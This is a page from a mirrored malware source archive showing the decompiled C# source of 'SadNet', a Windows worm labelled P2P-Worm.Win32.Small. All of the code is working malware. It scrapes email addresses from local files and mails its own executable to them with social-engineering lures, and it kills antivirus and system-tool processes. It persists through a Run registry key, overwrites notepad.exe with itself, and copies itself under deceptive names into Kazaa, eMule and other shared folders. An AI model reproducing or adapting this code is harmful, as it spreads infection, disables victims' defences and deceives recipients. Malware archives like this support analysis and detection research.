mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
349 lines
11 KiB
C#
349 lines
11 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: SadNet.Form1
|
|||
|
// Assembly: SadNet, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: 7CA2C9C9-C782-4D2C-95AC-6004CBF68D8D
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Small.v-e11f1e1c2820f02fe46d7297e75a556346d661ee4bc64e6f222c74d56cf83bfd.exe
|
|||
|
|
|||
|
using Microsoft.Win32;
|
|||
|
using System;
|
|||
|
using System.ComponentModel;
|
|||
|
using System.Diagnostics;
|
|||
|
using System.Drawing;
|
|||
|
using System.IO;
|
|||
|
using System.Text;
|
|||
|
using System.Text.RegularExpressions;
|
|||
|
using System.Web.Mail;
|
|||
|
using System.Windows.Forms;
|
|||
|
|
|||
|
namespace SadNet
|
|||
|
{
|
|||
|
public class Form1 : Form
|
|||
|
{
|
|||
|
private IContainer components;
|
|||
|
private Timer mailer;
|
|||
|
private Timer killer;
|
|||
|
|
|||
|
public Form1() => this.InitializeComponent();
|
|||
|
|
|||
|
private void mailer_Tick(object sender, EventArgs e)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
string str1 = new string[20]
|
|||
|
{
|
|||
|
"mcafee",
|
|||
|
"symantec",
|
|||
|
"Yahoo!",
|
|||
|
"Thank you!",
|
|||
|
"Text message",
|
|||
|
"Document",
|
|||
|
"Incoming Message ",
|
|||
|
"Message Notify ",
|
|||
|
"Fax Message",
|
|||
|
"Protected message",
|
|||
|
"panda",
|
|||
|
"Encrypted document",
|
|||
|
"Account notify",
|
|||
|
"E-mail account disabling warning",
|
|||
|
"E-mail technical support message.",
|
|||
|
"E-mail warning",
|
|||
|
"Email account utilization warning.",
|
|||
|
"Fax Message Received ",
|
|||
|
"Forum notify ",
|
|||
|
"do you know AmirCivil?"
|
|||
|
}[new Random().Next(0, 20)];
|
|||
|
string str2 = new string[5]
|
|||
|
{
|
|||
|
"AmirCivil.pic.cmd",
|
|||
|
"register.pif ",
|
|||
|
"sexy-screensaver.scr ",
|
|||
|
"fullmessenger.exe",
|
|||
|
"readme.html.cmd"
|
|||
|
}[new Random().Next(0, 5)];
|
|||
|
string str3 = new string[20]
|
|||
|
{
|
|||
|
"Deliver Error",
|
|||
|
"Message Error",
|
|||
|
"help attached ",
|
|||
|
"such as yours",
|
|||
|
"illegal st. of you?",
|
|||
|
"is that your name? ",
|
|||
|
"picture? ",
|
|||
|
"abuse? ",
|
|||
|
"is that yours? ",
|
|||
|
"I have your password! ",
|
|||
|
"classroom test of you? ",
|
|||
|
"old photos about you? ",
|
|||
|
"i hope thats not true! ",
|
|||
|
"does it match? ",
|
|||
|
" you know amir_civil?!",
|
|||
|
"why should I? ",
|
|||
|
"another pic, have fun! ... :->",
|
|||
|
"xxx ? ",
|
|||
|
"the information is wrong! ",
|
|||
|
"love letter? "
|
|||
|
}[new Random().Next(0, 20)];
|
|||
|
string searchPattern = new string[2]
|
|||
|
{
|
|||
|
"*txt",
|
|||
|
"*html"
|
|||
|
}[new Random().Next(0, 2)];
|
|||
|
string str4 = new string[20]
|
|||
|
{
|
|||
|
"mcafee@yahoo.com",
|
|||
|
"symantec@yahoo.com",
|
|||
|
"nod32@yahoo.com",
|
|||
|
"panda@yahoo.com",
|
|||
|
"avg@yahoo.com",
|
|||
|
"antiblaster@yahoo.com",
|
|||
|
"info@yahoo.com",
|
|||
|
"ebook@yahoo.com",
|
|||
|
"LongShot@yahoo.com",
|
|||
|
"iraq@yahoo.com",
|
|||
|
"update@yahoo.com",
|
|||
|
"matt@yahoo.com",
|
|||
|
"steve@yahoo.com",
|
|||
|
"smith@yahoo.com",
|
|||
|
"stan@yahoo.com",
|
|||
|
"bill@yahoo.com",
|
|||
|
"bob@yahoo.com",
|
|||
|
"YourFriend@yahoo.com",
|
|||
|
" mail@yahoo.com",
|
|||
|
"ted@yahoo.com"
|
|||
|
}[new Random().Next(0, 20)];
|
|||
|
string path = new string[5]
|
|||
|
{
|
|||
|
"C:\\",
|
|||
|
"D:\\",
|
|||
|
"E:\\",
|
|||
|
"G:\\",
|
|||
|
"F:\\"
|
|||
|
}[new Random().Next(0, 5)];
|
|||
|
for (int index = 0; index < 10; ++index)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
string[] strArray = new string[3]
|
|||
|
{
|
|||
|
"C:\\dir1",
|
|||
|
"D:\\",
|
|||
|
"C:\\windows"
|
|||
|
};
|
|||
|
foreach (string str5 in strArray)
|
|||
|
{
|
|||
|
foreach (string file in Directory.GetFiles(path, searchPattern))
|
|||
|
{
|
|||
|
Regex regex = new Regex("[a-zA-Z0-9-_.-]+@[a-zA-Z0-9-_.-]+\\.[a-zA-Z0-9]+");
|
|||
|
FileStream fileStream = new FileStream(file, FileMode.Open, FileAccess.Read);
|
|||
|
byte[] numArray = new byte[fileStream.Length];
|
|||
|
fileStream.Read(numArray, 0, (int) fileStream.Length);
|
|||
|
fileStream.Close();
|
|||
|
foreach (Match match in regex.Matches(Encoding.ASCII.GetString(numArray)))
|
|||
|
{
|
|||
|
string str6 = match.ToString();
|
|||
|
try
|
|||
|
{
|
|||
|
MailMessage message = new MailMessage();
|
|||
|
message.From = str4;
|
|||
|
message.To = str6;
|
|||
|
message.Cc = "info@yahoo.com";
|
|||
|
message.Bcc = "password@yahoo.com";
|
|||
|
message.Subject = str1;
|
|||
|
message.Body = str3;
|
|||
|
SmtpMail.SmtpServer = "mx4.mail.yahoo.com";
|
|||
|
message.Attachments.Add((object) new MailAttachment(Application.ExecutablePath, MailEncoding.Base64));
|
|||
|
SmtpMail.Send(message);
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
private void killer_Tick(object sender, EventArgs e)
|
|||
|
{
|
|||
|
string[] strArray = new string[56]
|
|||
|
{
|
|||
|
"NPROTECTED",
|
|||
|
"GhostTray",
|
|||
|
"NAVW32",
|
|||
|
"F-AGNT95",
|
|||
|
"NOD32",
|
|||
|
"NETD32",
|
|||
|
"NETMON",
|
|||
|
"IOMON98",
|
|||
|
"SCAN32",
|
|||
|
"NORMIST",
|
|||
|
"NAVW3",
|
|||
|
"ADAWARE",
|
|||
|
"AGENTW",
|
|||
|
"LU32",
|
|||
|
"NAVAP32",
|
|||
|
"ANTIVIR",
|
|||
|
"TCM",
|
|||
|
"W9X",
|
|||
|
"AVKSERV",
|
|||
|
"winamp",
|
|||
|
"ACKWIN32",
|
|||
|
"AD-AWARE",
|
|||
|
"ADVXDWIN",
|
|||
|
"AGENTSVR",
|
|||
|
"AGENTW",
|
|||
|
"ANTIVIRUS",
|
|||
|
"ANTS",
|
|||
|
"APIMONITOR",
|
|||
|
"APLICA32",
|
|||
|
"ARR",
|
|||
|
"AUPDATE",
|
|||
|
"AUTODOWN",
|
|||
|
"AUTOTRACE",
|
|||
|
"AVE32",
|
|||
|
"AVGCC32",
|
|||
|
"AVGCTRL",
|
|||
|
"AVGNT",
|
|||
|
"CFINET",
|
|||
|
"CLEANPC",
|
|||
|
"CTRL",
|
|||
|
"AV32",
|
|||
|
"DATEMANAGER ",
|
|||
|
"DOORS",
|
|||
|
"DPFSETUP ",
|
|||
|
"FCH32 ",
|
|||
|
"FNRB32",
|
|||
|
"notepad",
|
|||
|
"killer",
|
|||
|
"POP3TRAP",
|
|||
|
"remind",
|
|||
|
"cftmon",
|
|||
|
"msmsgs",
|
|||
|
"taskmgr",
|
|||
|
"regedit",
|
|||
|
"vb6",
|
|||
|
"ZONEALARM"
|
|||
|
};
|
|||
|
foreach (Process process in Process.GetProcessesByName(strArray[new Random().Next(0, 56)]))
|
|||
|
process.CloseMainWindow();
|
|||
|
}
|
|||
|
|
|||
|
private void hidden_Tick(object sender, EventArgs e)
|
|||
|
{
|
|||
|
}
|
|||
|
|
|||
|
private void error_Tick(object sender, EventArgs e)
|
|||
|
{
|
|||
|
}
|
|||
|
|
|||
|
private void copy_Tick(object sender, EventArgs e)
|
|||
|
{
|
|||
|
}
|
|||
|
|
|||
|
private void amir(object sender, EventArgs e)
|
|||
|
{
|
|||
|
this.Hide();
|
|||
|
try
|
|||
|
{
|
|||
|
File.Copy(Application.ExecutablePath, Environment.SystemDirectory + "\\winlogon.cab.exe");
|
|||
|
Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "SadNet", (object) (Environment.SystemDirectory + "\\winlogon.cab.exe"), RegistryValueKind.ExpandString);
|
|||
|
Registry.SetValue("HKEY_CURRENT_USER\\SadNet", "SadNet", (object) "(_-oO]xX|-|S|-|a|-|d|-|N|-|e|-|t|-|Xx[Oo-_)!", RegistryValueKind.ExpandString);
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
}
|
|||
|
try
|
|||
|
{
|
|||
|
File.Move(Environment.SystemDirectory + "\\notepad.exe", Environment.SystemDirectory + "\\AmirCivil.exe");
|
|||
|
File.Copy(Application.ExecutablePath, Environment.SystemDirectory + "\\notepad.exe");
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
}
|
|||
|
try
|
|||
|
{
|
|||
|
File.Copy(Application.ExecutablePath, "C:\\symantec.exe");
|
|||
|
File.Copy(Application.ExecutablePath, "D:\\fun.pic.scr");
|
|||
|
File.Copy(Application.ExecutablePath, "E:\\wow.pif");
|
|||
|
File.Copy(Application.ExecutablePath, "F:\\mail.cmd");
|
|||
|
File.Copy(Application.ExecutablePath, "C:\\Program Files\\Kazaa\\My Shared Folder\\winampa.dll.pif");
|
|||
|
File.Copy(Application.ExecutablePath, "C:\\Program Files\\StreamCast\\Morpheus\\My Shared Folder\\winampa.dll.pif");
|
|||
|
File.Copy(Application.ExecutablePath, "C:\\Program Files\\Gnucleus\\Downloads\\AnyDVD.v6.0.0.4.Cracked-RES.by.Warez.exe");
|
|||
|
File.Copy(Application.ExecutablePath, "C:\\Program Files\\eMule\\Incoming\\symantec.cmd");
|
|||
|
File.Copy(Application.ExecutablePath, "D:\\Program Files\\Kazaa\\My Shared Folder\\winampa.dll.pif");
|
|||
|
File.Copy(Application.ExecutablePath, "D:\\Program Files\\StreamCast\\Morpheus\\My Shared Folder\\winampa.dll.pif");
|
|||
|
File.Copy(Application.ExecutablePath, "D:\\Program Files\\Gnucleus\\Downloads\\AnyDVD.v6.0.0.4.Cracked-RES.by.Warez.exe");
|
|||
|
File.Copy(Application.ExecutablePath, "D:\\Program Files\\eMule\\Incoming\\symantec.cmd");
|
|||
|
File.Copy(Application.ExecutablePath, "E:\\Program Files\\Kazaa\\My Shared Folder\\winampa2.dll.pif");
|
|||
|
File.Copy(Application.ExecutablePath, "E:\\Program Files\\StreamCast\\Morpheus\\My Shared Folder\\winampa.dll.pif");
|
|||
|
File.Copy(Application.ExecutablePath, "E:\\Program Files\\Gnucleus\\Downloads\\AnyDVD.v6.0.0.4.Cracked-RES.by.Warez.exe");
|
|||
|
File.Copy(Application.ExecutablePath, "E:\\Program Files\\eMule\\Incoming\\symantec.cmd");
|
|||
|
File.Copy(Application.ExecutablePath, "C:\\Program Files\\Kazaa\\My Shared Folder\\winampa.dll.pif");
|
|||
|
File.Copy(Application.ExecutablePath, "D:\\Program Files\\Kazaa\\My Shared Folder\\project.exe");
|
|||
|
File.Copy(Application.ExecutablePath, "J:\\Program Files\\Kazaa\\My Shared Folder\\SkyNetAntiVirus.doc.cmd");
|
|||
|
File.Copy(Application.ExecutablePath, "E:\\Program Files\\Kazaa\\My Shared Folder\\screen_saver!.scr");
|
|||
|
File.Copy(Application.ExecutablePath, "F:\\Program Files\\Kazaa\\My Shared Folder\\winlogon.dll.exe");
|
|||
|
File.Copy(Application.ExecutablePath, "H:\\Program Files\\Kazaa\\My Shared Folder\\fun.pic.scr");
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
}
|
|||
|
try
|
|||
|
{
|
|||
|
api.ShowWindow(api.FindWindow("ConsoleWindowClass", (string) null), 0);
|
|||
|
api.ShowWindow(api.FindWindow("#32770", (string) null), 0);
|
|||
|
api.ShowWindow(api.FindWindow("MGHTML_DLG_CLASS", (string) null), 0);
|
|||
|
api.ShowWindow(api.FindWindow("NAVAP Wnd Clas", (string) null), 0);
|
|||
|
api.ShowWindow(api.FindWindow("RegEdit_RegEdit", (string) null), 0);
|
|||
|
api.ShowWindow(api.FindWindow("notepad", (string) null), 0);
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
private void hien_Tick(object sender, EventArgs e)
|
|||
|
{
|
|||
|
}
|
|||
|
|
|||
|
private void mail2_Tick(object sender, EventArgs e)
|
|||
|
{
|
|||
|
}
|
|||
|
|
|||
|
protected override void Dispose(bool disposing)
|
|||
|
{
|
|||
|
if (disposing && this.components != null)
|
|||
|
this.components.Dispose();
|
|||
|
base.Dispose(disposing);
|
|||
|
}
|
|||
|
|
|||
|
private void InitializeComponent()
|
|||
|
{
|
|||
|
this.components = (IContainer) new Container();
|
|||
|
this.mailer = new Timer(this.components);
|
|||
|
this.killer = new Timer(this.components);
|
|||
|
this.SuspendLayout();
|
|||
|
this.mailer.Enabled = true;
|
|||
|
this.mailer.Interval = 30000;
|
|||
|
this.mailer.Tick += new EventHandler(this.mailer_Tick);
|
|||
|
this.killer.Enabled = true;
|
|||
|
this.killer.Tick += new EventHandler(this.killer_Tick);
|
|||
|
this.AutoScaleDimensions = new SizeF(6f, 13f);
|
|||
|
this.AutoScaleMode = AutoScaleMode.Font;
|
|||
|
this.ClientSize = new Size(292, 266);
|
|||
|
this.Name = nameof (Form1);
|
|||
|
this.Text = "SadNet";
|
|||
|
this.Activated += new EventHandler(this.amir);
|
|||
|
this.ResumeLayout(false);
|
|||
|
}
|
|||
|
}
|
|||
|
}
|